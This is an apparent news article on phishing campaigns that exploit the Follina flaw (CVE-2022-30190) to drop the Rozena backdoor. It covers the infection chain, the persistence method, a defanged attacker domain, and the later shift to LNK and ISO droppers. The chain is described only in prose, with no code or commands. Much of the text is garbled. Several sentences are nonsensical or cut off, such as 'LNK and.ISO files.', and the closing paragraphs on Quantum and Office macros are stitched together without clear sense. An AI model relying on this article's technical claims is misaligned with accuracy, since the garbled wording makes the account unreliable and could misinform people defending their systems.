Hackers exploited a flaw in Follina to install Rozena backdoor

Phishing attacks are now spreading a previously unknown backdoor on Windows systems by exploiting the just-disclosed Follina security vulnerability.

According to a new report from Fortinet FortiGuard Labs researcher Cara Lin, "Rozena is a backdoor malware that can inject a remote shell connection back to the attacker's machine.".

The CVE-2022-30190 remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) has been heavily exploited in recent weeks since it was first discovered in late May 2022.

As part of the latest attack chain, Fortinet discovered a weaponized Office document that connects to a Discord CDN URL and retrieves an HTML file ("index.htm") before using a PowerShell command to launch the diagnostic tool and begin downloading the next stage of payloads from the same CDN attachment space as before.

"Word.exe" is the Rozena implant, while "cd.bat" is a batch file designed to terminate MSDT processes and establish the backdoor's persistence via Windows Registry modification.

Shellcode infecting the malware's host (microsofto.duckdns[.org]) is used to launch a reverse shell, allowing the attacker to take control of a system that monitors and captures information, as well as a backdoor to the compromised system.

Malicious Word documents containing the Follina flaw are used in social engineering attacks to distribute malware such as Emotet, QBot, IcedID, and Bumblebee to a victim's device via Windows shortcut (LNK) and ISO images.

According to reports, the droppers are distributed via emails that include the dropper as an attachment, a password-protected ZIP file, an HTML file that, when opened, extracts the dropper, or a link to a download page for the dropper.

However, Microsoft's decision around the same time to block macros by default is said to have forced the threat actors to pivot to alternative methods like HTML smuggling and when attacks first appeared in early April.

LNK and.ISO files.

It was only a month ago that Cyble revealed the existence of a malware tool called Quantum, which is being sold on underground forums for use by cybercriminals.

File formats such as.LNK and.ISO are also supported.

To put it another way, ransomware and other malware can be dropped on Windows systems via phishing emails or other methods that use macros, such as macros in Word documents.

Microsoft has temporarily put a halt to its plans to disable Office macros in files downloaded from the internet as the company works to improve "usability."